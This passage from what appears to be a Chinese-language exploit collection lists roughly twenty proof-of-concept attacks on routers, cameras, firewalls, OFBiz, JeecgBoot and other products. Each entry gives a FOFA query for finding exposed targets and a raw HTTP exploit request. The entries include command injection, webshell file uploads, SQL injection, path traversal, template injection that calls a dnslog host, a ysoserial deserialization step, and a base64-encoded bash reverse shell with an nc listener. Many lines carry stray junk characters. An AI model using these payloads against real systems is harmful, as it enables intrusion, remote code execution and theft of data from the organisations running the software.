! C5 L$ i+ U R; k" H4 c6 ~# q* m& k
YsOxWxSvj1KyZow1PTsh98fdu6l: }) \, w5 [$ d- Y- s* @
------YsOxWxSvj1KyZow1PTsh98fdu6l
: g; j" e, \: e% dContent-Disposition: form-data; name="target"
! X8 a& l' f8 L* |. X; {) Q
5 D: L7 h; d1 p1 M$ v: v/ V( v% ?/Applications/SkillDevelopAndEHS/
, ]0 ^1 R6 |; |. E7 j7 B$ R& S6 C------YsOxWxSvj1KyZow1PTsh98fdu6l--9 b( Q/ t0 H) t
& u: N6 E( I+ _1 H: ?
6 q1 V& R9 L3 b, G
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
: ]1 C8 f5 @4 RHost: x.x.x.x5 x) Z. }2 P0 T1 M! O& R
+ I2 R3 l0 c! |+ F0 F% c& }
0 N$ K( n* ?! G) ~
79. BYTEVALUE 百为流控路由器远程命令执行
" j9 U3 t, I% R T8 XFOFA:BYTEVALUE 智能流控路由器# u0 \" K: u! [1 j, X
GET /goform/webRead/open/?path=|id HTTP/1.11 n6 `9 p% ~* O5 I1 m) U G
Host:IP
# Y8 Q9 Z. Q! ~. d" KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0# a( z0 b0 G, }9 J$ l( ^ O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 W/ x% C( Z# H: Y4 e- o" }1 H9 qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 M& X) Z7 d) wAccept-Encoding: gzip, deflate! P' G7 i' p0 { {' O5 K$ I
Connection: close
/ l8 }# s! h- q' V* jUpgrade-Insecure-Requests: 1
! W: {. Y) `- g
$ Z1 P7 \% z. c! g6 m2 X% x: n3 Z1 a6 M ^* n1 |: w, `$ ^
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传6 G |+ W% Y9 M! F) g, L
FOFA:app="速达软件-公司产品"
. a( G1 P Z/ [POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1+ ]" x. }0 u; r- I6 y2 _ c
Host: x.x.x.x( w- W' j. p- N. A4 b' F6 p5 v) a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
L; O* ?7 g I2 aContent-Length: 27
* m0 n4 b: a n2 W, v9 bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: y0 F6 k% t- h0 |( y( O9 i7 R- X
Accept-Encoding: gzip, deflate
+ u- F- L; u- t# f$ U; j: rAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ J8 }% s2 j( J2 ~0 E$ }5 x7 z/ l
Connection: close8 V( V% B6 O: o) V; n. l
Content-Type: application/octet-stream& O% d# [' d: ~0 p3 ^ q2 @( t4 e
Upgrade-Insecure-Requests: 1
/ U2 p" I8 G- _, {
+ w" ]" c8 m9 d/ D9 Q6 r<% out.print("oessqeonylzaf");%>! W! T! q, m( D( ^! u
1 _9 w1 N3 m6 ^6 M6 B* x6 f
* U! Z3 q+ O3 {- H' d, z Y, OGET /xykqmfxpoas.jsp HTTP/1.1. b* u% U7 E7 w! G0 z: I7 H, A
Host: x.x.x.x
; G% l8 j8 W7 q, P& l9 i0 BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 [* o4 c$ U0 }, m
Connection: close
+ M( h6 L. n) i% {% \# NAccept-Encoding: gzip
; z" n4 m8 I, F; m4 ~7 j6 c0 p
6 t3 r' j3 P x* |/ @6 P7 i5 T9 _, }0 }' ]+ A- R
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
$ y, z! H0 H; k3 Z9 |# B" QFOFA:app="uniview-视频监控"$ [2 X6 p& G/ g! ^8 ^* G2 x0 k
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
: i! t' t4 A7 |) Z4 P; ~4 ]Host: x.x.x.x
% T; C" v5 _; a. L9 nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.158 x/ G* Y; ?$ J# c0 j$ Y# }# J" }
Connection: close+ W d) F$ V- c
Accept-Encoding: gzip
+ z) [ _0 f2 D# [2 l
: e$ W2 p2 |/ L4 f3 n; o; r' T, A
7 _1 e6 M8 u* ]) K; T82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行 l+ Q5 k; B+ Y. [
FOFA:app="思福迪-LOGBASE"# m1 M! A# B! C9 @8 N. o
POST /bhost/test_qrcode_b HTTP/1.1
$ _: r2 a. M8 z. KHost: BaseURL
) s) p# Z( }8 w- W7 G, M. q- [% YUser-Agent: Go-http-client/1.1
! D1 q+ i7 L5 g _0 w0 h& @Content-Length: 23
5 `/ \( d0 k# N, b3 ^Accept-Encoding: gzip
2 [) C$ Z2 Q. x* _. R1 q* Y+ cConnection: close
9 S7 V+ u8 H( b# i1 [# k" uContent-Type: application/x-www-form-urlencoded
) m; q. V* }- [" Z) J3 s# [. `; x4 UReferer: BaseURL
! s: r$ Z( D8 [: A$ D2 O& a
* @$ Z) W2 e/ j, J# \. K( \6 _- Jz1=1&z2="|id;"&z3=bhost* R% |; s# L9 j2 ]2 |% d/ G
+ R. Q9 Z8 i/ }
7 Y8 ]& H8 n5 {- W! S1 s- m- D, u" z
83. JeecgBoot testConnection 远程命令执行1 ?; }+ H. j7 J1 p
FOFA:title=="JeecgBoot 企业级低代码平台"
1 a) F9 G- i, K1 U$ ~$ o: p+ Y$ P$ u+ _9 _) h j( z+ X
3 b# }7 M" Q$ [5 X) y8 ]
POST /jmreport/testConnection HTTP/1.1
; Q& ]4 O/ F, X$ l# H4 Z# R2 |Host: x.x.x.x8 g( n& W& J+ \: V" F% f( t) ]% c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.158 u. Y* S$ a9 |/ S! _* m
Connection: close3 F7 P: R0 N8 I# d/ \# K
Content-Length: 8881+ `0 s- H4 b$ Q3 ~
Accept-Encoding: gzip. f7 h) P7 H3 O4 l* x0 u
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"/ _% H- u+ j- C, F! J+ x
Content-Type: application/json3 R4 c. k5 R# j- T1 X* v) N" J
2 p" c! F. T+ |; O- ^4 R8 L
PAYLOAD
+ z$ b8 I) N4 N8 z8 q: s5 U2 J/ p5 J3 M9 J
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入. j8 N# u! X3 M9 K
FOFA:title=="JeecgBoot 企业级低代码平台" V; t3 W6 T5 e x2 l
. |0 x7 G5 w3 A, F
+ G' g/ M' M- R; @7 K( R# ?- E
! U# |5 A* `& |! o4 ?7 L$ o
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1: U% q/ Y; f @; [9 O( N
Host: 192.168.40.130:8080
& B; e/ B9 M2 e. L2 @User-Agent: curl/7.88.1) l! t' Q) |& R+ f$ w, T5 [
Content-Length: 156
* ~+ `& g0 _/ S( t; ~) s4 rAccept: */*
. A1 _+ Q1 v9 `Connection: close
) Z1 U, r' a$ CContent-Type: application/json! [! z" Z) c F% g& Q9 [
Accept-Encoding: gzip7 b" U4 M' \( K* `; Z2 m
6 U7 x$ X6 I5 y7 q4 z) k
{* z+ L7 N! G1 S7 e* r6 N
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
* |4 a' R4 C: b% d "type": "0"( U- p* E, n5 f
}
! z R0 n8 w) Y$ f; i
1 i0 k8 y& `% C' g: X! G$ c+ v0 h
+ J+ Z+ p6 [, L y' i) u/ O85. SysAid On-premise< 23.3.36远程代码执行
D* X1 U" Q3 B4 W: K& zCVE-2023-47246. w( ^$ I5 i& t* x! h5 }, e
FOFA:body="sysaid-logo-dark-green.png"
) O7 ]' F8 e% K- P2 }( w3 XEXP数据包如下,注入哥斯拉马
! Y) n9 n! X2 x6 t O; |- JPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1; u+ e8 \) U- R+ e) u. n3 a
Host: x.x.x.x$ D" F* Q5 y1 f& u7 k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 a( Z9 @ n, AContent-Type: application/octet-stream
# ~1 n7 g5 C, e, e) C% M! xAccept-Encoding: gzip
2 R7 s# B# e1 G# \( u" \& F$ K; P) l, d7 ?. Y1 `6 C+ u6 V
PAYLOAD5 P% T A; @: A1 ^
. P- t- p( f6 p4 X3 |" e; a: m2 Z
回显URL:http://x.x.x.x/userfiles/index.jsp
/ \- _$ _! j% w" s$ c' Q
1 @; ]6 Z# U! x86. 日本tosei自助洗衣机RCE' Z. J9 u4 V/ |* l% T- R# G
FOFA:body="tosei_login_check.php"
5 u9 p: ]4 J' a6 J6 r% qPOST /cgi-bin/network_test.php HTTP/1.1
- o' u# k. G/ E/ UHost: x.x.x.x
! D( ~0 @9 A6 i% y* U( MUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36) {6 A, L0 g8 B# I7 g5 y
Connection: close
* s5 P; Q; c5 A' S% [Content-Length: 44
3 K5 w* R0 ]4 @: E/ h( \7 VAccept: */*
& i+ o8 r! A9 h! J6 ?% l) K. _Accept-Encoding: gzip# f# P9 N. }0 p
Accept-Language: en5 m, k6 c2 J' O4 V z" S, ^9 V, o; ^7 v
Content-Type: application/x-www-form-urlencoded; t) j. e3 | o9 _
& m: z. s, l' o0 g* {9 \7 a3 ]
host=%0acat${IFS}/etc/passwd%0a&command=ping
3 X2 O" W6 M+ l* n, Y3 y2 x) ]( q1 q2 n. t7 ]" B( N( x
* F6 v3 {. o7 F
87. 安恒明御安全网关aaa_local_web_preview文件上传 G+ V2 x: ]3 \7 @- i3 s- w4 `
FOFA:title="明御安全网关"& w. a d1 T" l7 x
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1- o. @. @' u, q7 K- _: X
Host: X.X.X.X
% @$ V# w' O2 x2 sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* m! a% ]# i; m! }0 U% eConnection: close* A( h- y$ S" `
Content-Length: 198
+ Z( k1 h) g$ G6 D3 uAccept-Encoding: gzip
& d8 U; R6 R, ]0 _8 l# wContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd! @7 `+ `; X D) K
9 i! B& c3 @1 O7 ]2 Y
--qqobiandqgawlxodfiisporjwravxtvd
2 j9 s6 V! v, a! g: R6 }. RContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"
5 d( `* D' V6 O; z s! GContent-Type: text/plain
' B) N' w1 e+ \; n, Y
) I: {, L% z) v. s& V1 E) C/ V2ZqGNnsjzzU2GBBPyd8AIA7QlDq; X7 m# |2 U4 s' j
--qqobiandqgawlxodfiisporjwravxtvd--9 n2 m! p1 a. `* [8 z
0 M/ N7 s, o' r) J& |2 a& x9 ?$ e3 A# R2 c( o, i
/jfhatuwe.php; B7 v, _6 Z6 @2 J7 l( X& b
* b [6 r( z. u( |88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行. j& S" J# _7 O; }
FOFA:title="明御安全网关"0 M1 K X7 ~: N, K4 ^, d
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1# R: Y- m& { D, m! ~2 X
Host: x.x.x.xx.x.x.x0 |2 ]/ O: b+ K- \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. a$ {5 @ H1 F7 N) iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) t3 b$ x8 [ z' }
Accept-Encoding: gzip, deflate
3 C* }; c+ Y1 M: @" |% \! TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 F) @5 ^0 N0 x; R# e
Connection: close) d- ~6 S* r9 a5 P3 q
# |5 ]7 B Q2 C ~' u0 n
1 y3 y4 b! X: Y! b* G0 E/astdfkhl.php
5 ]4 G/ |3 S/ j$ r( q1 I4 t" w
0 I: |6 J4 u( R8 V7 m. S" g89. 致远互联FE协作办公平台editflow_manager存在sql注入
& X, [% m1 [/ b$ |" Q9 aFOFA:title="FE协作办公平台" || body="li_plugins_download") H# z" q, o( x. T' l
POST /sysform/003/editflow_manager.js%70 HTTP/1.1' ^1 n& E1 }: S! r |
Host: x.x.x.x
" q5 z) c7 p6 n7 [" z+ nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' \0 Z& P4 O& o. V0 ]" TConnection: close
; y1 H0 I" F. O/ eContent-Length: 413 {: ~! ]2 M+ N# G Y# _3 d( [
Content-Type: application/x-www-form-urlencoded' G6 c! x5 g5 I9 Q0 H
Accept-Encoding: gzip
9 v" `: ]0 U. ^0 {* G
5 d" x) s4 \" P+ N5 G- Poption=2&GUID=-1'+union+select+111*222--+
% n; ]9 b6 e* n" T5 [/ t9 R7 D( a
" o- A" ?: a+ d* J& k" {+ D+ S% q& j- B
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行, K8 U; q, x# a" P
FOFA:icon_hash="-1830859634"
5 m6 A" n/ @6 U. G# L0 ZPOST /php/ping.php HTTP/1.1! Z4 b) W r0 z3 N6 h
Host: x.x.x.x
4 q2 K& a( v9 w( E1 u( Q( oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0* ]( D4 x1 S' A# m7 I
Content-Length: 51* t* D; _7 g. g; ]
Accept: application/json, text/javascript, */*; q=0.01; f$ L f1 q4 H# G7 i [
Accept-Encoding: gzip, deflate" s- N# D* C" z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 w' i. y( Y( n6 y: @
Connection: close
1 u- d) t" B* q2 pContent-Type: application/x-www-form-urlencoded
$ U0 {6 z+ n* ]$ J3 aX-Requested-With: XMLHttpRequest
* K% L( f' o } a3 S( C3 ~4 R; a0 d2 V- D4 k
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
! j# W9 C' y/ p+ S2 \
! { W3 R7 E4 E' { Q0 F
1 X: x8 R Z& W4 J; D+ u4 V91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
# a8 u S! R3 t" ?FOFA:title="综合安防管理平台"
6 N& O2 w! A0 C& [GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
: a# \# Q8 s- u a" }# z) sHost: your-ip! W, b, n8 ?' |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36% f* o o* K* _( c
Accept-Encoding: gzip, deflate
( H5 \) ^5 _, w% [$ VAccept: */*
" O8 |% X% X! a5 i8 ]Connection: keep-alive9 t7 {& }' U+ @8 s4 G: K. A
9 z( t6 z" x# D% j9 ]0 f
) b$ w1 ~/ c* A v" _, X6 p
4 D0 l, x9 h6 c, x9 ?0 r92. 海康威视运行管理中心session命令执行: L8 `# `% ^$ j2 O* [* v( R
Fastjson命令执行% R5 L, Z2 f( B S
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
$ H; V* {2 i9 APOST /center/api/session HTTP/1.1
9 T& P& @1 c5 U- N# JHost:
5 l) a+ Y" U4 E9 U( R {) rAccept: application/json, text/plain, */*
$ R9 o# o* O( j3 @Accept-Encoding: gzip, deflate
& j9 H. U1 X9 D3 q- m: S/ [X-Requested-With: XMLHttpRequest" y T, m/ e3 V, M! i- {
Content-Type: application/json;charset=UTF-8
% g4 H, k5 ~% _* p' z" c% mX-Language-Type: zh_CN6 X0 r+ P2 m9 F) E
Testcmd: echo test: x" q* e3 w( E1 z" F% A7 Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
8 u* b& H7 g6 y- IAccept-Language: zh-CN,zh;q=0.9' F/ o( X8 v8 |1 ?& p- |, J/ u
Content-Length: 5778% G8 W' O7 J @, B- }: {$ `* R
6 L2 @$ L! ?$ R2 @2 G' ]
PAYLOAD7 w$ s" ]6 {+ o
* r; B O8 h) z
1 D/ E2 L2 U4 w2 o2 F- X
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传7 C% P2 o# F( ]8 c; S
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
+ M3 e# O/ f- Q0 A' rPOST /?g=app_av_import_save HTTP/1.1
; q' f9 D1 r) VHost: x.x.x.x
( {5 ]# n( J* |; n+ ZContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx, F2 t7 q. h0 U
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36& j! j1 b1 l. C4 l
% [4 e0 x$ o' t; s( a) K------WebKitFormBoundarykcbkgdfx
5 _3 U0 l( p) M" ~8 R9 z+ QContent-Disposition: form-data; name="MAX_FILE_SIZE": w+ d" }7 {- f. i, f \' E }9 r
$ Z! r+ g$ g' i/ E2 D! N8 l
100000002 |4 A ~0 Y, Y: }; b3 U
------WebKitFormBoundarykcbkgdfx- o* b2 B5 z' g) s$ q
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt": h ^' |( c+ n" X3 H
Content-Type: text/plain1 w* D! v& p- n( Q% `8 x
. P# e5 r3 Z, }) |; c2 e' e2 {1 ]wagletqrkwrddkthtulxsqrphulnknxa
/ S: s3 @' `8 M; l------WebKitFormBoundarykcbkgdfx
6 u, d5 k4 L. @" f$ R. |Content-Disposition: form-data; name="submit_post"- s9 N- \: h, r& N3 W% c R" }5 p
$ V& n9 }1 T. t9 j. G
obj_app_upfile
% B# j, Z1 ]- j. H% M: O& I9 B0 `1 T------WebKitFormBoundarykcbkgdfx
& @- c" e$ P/ fContent-Disposition: form-data; name="__hash__", B& v ?# u. X/ F
7 M4 o/ l: X4 n' Y) q: {
0b9d6b1ab7479ab69d9f71b05e0e9445
* U' e+ `; |# u4 y( X1 L------WebKitFormBoundarykcbkgdfx--( Q( Z4 p' P3 v" b) h+ p
; l( v5 Z; e/ t7 R* @* j
" q4 U1 _. X3 \# u3 M% ^) d
GET /attachements/xlskxknxa.txt HTTP/1.1# Y+ Y5 d: e i0 R" y; L
Host: xx.xx.xx.xx) g) z- t, P; T1 }5 |( X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36$ f2 M1 g T% g- Y) Z
$ S0 d" q3 F& N! a8 D
3 N. m' K9 r6 k5 D3 Z94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
, R, I. j# l8 M f( e5 ?! hFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
: t' ~5 V. K4 S) ?POST /?g=obj_area_import_save HTTP/1.1
. l& ]% m8 X: i, UHost: x.x.x.x% p- y5 y' S4 P
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
& ^9 L6 d" R5 g- c' \- k9 ^3 ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36: k+ c. ^% j: `) h
a* |3 b W; k0 E& q8 n
------WebKitFormBoundarybqvzqvmt$ m: \4 P- p5 z$ Y
Content-Disposition: form-data; name="MAX_FILE_SIZE"
1 H! b& e- J5 i- u( a: E4 x5 y& Q/ R0 {) j3 k, X3 T
10000000
- k* w& S/ e/ B& K( ~------WebKitFormBoundarybqvzqvmt4 m( b. y2 P4 k: n( [0 P
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
' l! L" v! a+ tContent-Type: text/plain
4 j: m) I/ |, R" u5 b- D& V. z8 e" @; v+ w3 h0 f( Q2 O
pxplitttsrjnyoafavcajwkvhxindhmu
2 `1 W3 B2 ?* Z! P+ E8 q9 b------WebKitFormBoundarybqvzqvmt
+ n" d* u8 m7 R$ K# W- WContent-Disposition: form-data; name="submit_post"0 c1 j3 s* Q2 Z w
6 b( x$ x' C% @3 g! h$ w2 q
obj_app_upfile
* \- O; I8 c( ?------WebKitFormBoundarybqvzqvmt) T7 J, n# d. H |# a5 ], K; j8 y
Content-Disposition: form-data; name="__hash__"8 `. F; N& m3 l- h$ ^/ H) U
0 E l3 C2 x k1 P# Y, X
0b9d6b1ab7479ab69d9f71b05e0e9445* M% ~/ d' N8 V P2 |
------WebKitFormBoundarybqvzqvmt--* F& w7 U I c$ i( \
/ S' T: S/ O3 q1 h& P/ T! {' I. ?- ~9 K' B9 S. f
s$ B# \7 |7 O6 V; m
GET /attachements/xlskxknxa.txt HTTP/1.1
1 ?: Q6 M* t3 AHost: xx.xx.xx.xx7 M5 O( j y/ r) J" i
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
% {& \4 t) U2 M0 h7 }; S$ |- i7 Y; A6 {
( l, y. N: {; w% W
& x* F' A6 s1 ^- G @95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行2 I w+ i# I" u
CVE-2023-49070- H# C5 A/ N8 U# w; }( `) |
FOFA:app="Apache_OFBiz"
3 s# W1 r- n7 \6 qPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
: h, z; K- M, s1 q. Y# R zHost: x.x.x.x$ F* X9 I& K1 U4 O8 W
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.364 B! G. q/ N0 I. }* x6 V) `0 B# x
Connection: close
6 l T7 j& D$ F! z, j* rContent-Length: 889/ k! ^+ k/ ^4 L6 B+ N: d
Content-Type: application/xml
" B; L _5 z& V6 LAccept-Encoding: gzip. I% a0 P/ M0 `% E8 } x
M. B, m. y$ @3 T5 ?, S<?xml version="1.0"?>) v" X+ W @9 t$ w% l
<methodCall>
) @* e- W1 T8 P2 o <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>7 q# w" s/ u# d0 y% Y
<params>
* B' d7 [' x3 Z" s: ?. A* Q <param>
' C: b7 ?9 Y' p* H7 w4 B: H <value>
; i( y$ H# W$ o- f6 y9 e <struct>
4 V- T4 d/ f5 j5 r <member>
+ t2 w0 i2 d. i1 |, p/ B <name>test</name>" L# t( z* k% l, S) ]2 F
<value>
& l% o% l8 m; e0 ^. H <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>! h8 c) g. c& \% i: a3 t
</value>
; U! t+ P& A7 w </member>, }" V' N4 K# L) q5 P$ t* L! q
</struct>9 e2 D' x' F n. W: u& p* r d0 A# M
</value>% B" Y6 w( D; {/ q; A: M" A
</param>% p7 G2 q4 o* [4 S: j+ w6 a% A) h0 O
</params>1 R. g: P, ]6 b9 a8 J3 Q( f
</methodCall>. u' ]) w @; d# }1 o
. O( i. g2 T, R. J; f" N
, I7 P8 s: C4 ~" _! b
用ysoserial生成payload
5 \/ S" p1 b1 O$ O0 m- W* Bjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"$ Q2 h% R; b* Q/ S( O
2 H5 _* f+ Q2 e- X5 g
* m) K$ l$ n; R% [
将生成的payload替换到上面的POC0 o$ B( ^8 n3 W5 u
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
9 P. D0 ?3 N) o d; D1 THost: 192.168.40.130:8443: I% }. ^/ C+ w6 L7 E) Z% J
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
+ s4 X6 P5 ~5 X0 MConnection: close0 r1 O# H( u( J1 Y. A
Content-Length: 889
2 v& T, T* {1 u$ Y: QContent-Type: application/xml5 m$ P# p/ u7 w( L2 t/ H' q
Accept-Encoding: gzip A1 u% D9 m, q
4 E8 l1 V1 d, t! XPAYLOAD
* X% `! R& _3 `8 T' @8 T" u9 g1 N) G1 i+ H( J
96. Apache OFBiz 18.12.11 groovy 远程代码执行
0 E+ K0 ]5 ]5 XFOFA:app="Apache_OFBiz"4 o2 W$ _. g6 @. v9 v4 s
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1( n4 N8 S& n; V+ R/ ]% |
Host: localhost:8443
0 X. R; d1 ]& E# I" F0 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
4 N) W |( t) Y4 A4 @ |( ?Accept: */*
; z3 i" U& |6 b7 N- {: R- XAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 Z0 m: D2 ~+ n1 I6 f6 J; VContent-Type: application/x-www-form-urlencoded
$ y/ o2 Z [* ?4 fContent-Length: 552 t) \9 A& w6 \/ b7 R; c
6 y4 ^& N/ h0 T: y1 M
groovyProgram=throw+new+Exception('id'.execute().text);
4 \8 {$ O& A' }
6 F. A2 Z6 L3 l+ b
% P" q% k% A4 V# x" D ~8 w, |反弹shell
; v- O F; U4 m9 t' ?7 n# {在kali上启动一个监听* l& G# G2 ?/ @% f3 M
nc -lvp 7777
$ [, A; ?6 p$ o& p7 d% T& u; `" s ~3 v0 b/ ^/ _
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.12 [2 x- _2 F. t/ C8 M
Host: 192.168.40.130:8443
8 E/ c; A% P3 B5 O6 EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
/ X4 e$ W$ ~+ L8 I+ E) sAccept: */*
& T' z3 r6 K* V: t' M. oAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 b" n; m8 _# |5 U. \& c# `
Content-Type: application/x-www-form-urlencoded+ W, K5 I D; s2 a' T) ^
Content-Length: 71( E3 V }) O$ F. j5 m# e1 o
/ I6 T0 u/ D" \3 i
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
$ i3 D$ b6 |+ w+ M, w$ s; A" W5 i. ?6 U4 w% @: T I$ R9 P
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
8 E/ T- k; X, e. H' Y9 F$ OFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"5 G$ {6 t; z; T- v' S
GET /passport/login/ HTTP/1.12 M( r7 l5 y& e& j8 l
Host: 192.168.40.130:8085
$ f0 {7 `! W+ ^- r0 OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 y% P* H' {, S9 dAccept-Encoding: gzip
+ B7 h6 `3 o6 Y7 b: ^Connection: close
; O$ {. P) _/ w' ^9 S3 L" DCookie: rememberMe=PAYLOAD
3 W" ^3 D. T3 g: Z$ vX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
3 Q3 S* S7 c* q- D! d4 ~- b1 b5 ~4 C4 Z( s+ {5 t: n) M% E
4 B1 [% N! B* K1 F7 F5 Z98. SpiderFlow爬虫平台远程命令执行
7 `. A5 @& `0 Q6 ~/ yCVE-2024-0195. D4 {. M4 D5 h. j% P- {
FOFA:app="SpiderFlow"
1 Y P* G4 V- e5 `# O( _9 n% Y2 GPOST /function/save HTTP/1.1+ y1 F- p2 M) C4 U
Host: 192.168.40.130:8088, n1 ]& u t4 U! f8 i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.01 h- M- J5 z) a
Connection: close' Q) O$ C! a8 B1 Y2 ~" A. Z
Content-Length: 121
